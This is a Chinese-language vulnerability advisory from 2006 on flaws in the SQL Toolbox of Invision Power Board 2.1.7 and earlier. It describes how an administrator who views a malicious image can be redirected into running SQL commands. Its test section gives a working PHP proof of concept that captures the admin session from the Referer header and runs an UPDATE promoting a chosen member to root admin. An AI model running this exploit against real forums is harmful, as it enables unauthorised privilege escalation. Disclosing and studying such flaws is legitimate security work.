Invision Power Board SQL Toolbox多个安全漏洞
发布日期:2006-10-04
更新日期:2006-10-09
受影响系统:Invision PS IPB <= 2.1.7
描述:
CVE(CAN) ID:
CVE-2006-2059,
CVE-2006-2060,
CVE-2006-2061
Invision Power Board是一个非常流行的PHP论坛程序。
IPB的Toolbox在处理请求时存在漏洞,远程攻击者可能利用此漏洞非授权访问数据库。
如果管理员能够访问Invision Power Board的SQL Toolbox,且在浏览器中浏览了恶意图形,就可能被重新定向通过SQL Toolbox强制执行SQL命令。这种攻击很难被发现,因为仅有图形而不是页面被重新定向。
<*来源:Rapigator (
rapigator@yahoo.com)
链接:
http://secunia.com/advisories/19830/print/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
//The member id to promote to root admin
$mid = 145;
//The database prefix (usually "ibf_")
$prefix = "ibf_";
if (preg_match('/(.*adsess=[\\w]{32})/',
$_SERVER['HTTP_REFERER'], $admin_loc) and $mid)
{
header("Location:
".$admin_loc[1]."&act=sql&code=runsql&query=UPDATE+{$prefix}members+SET+mgroup%3D4+whe \
re+id%3D{$mid}+LIMIT+1"); }
?>
建议:
厂商补丁:
Invision PS
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.invisionpower.com/浏览次数:2627
严重程度:0(网友投票)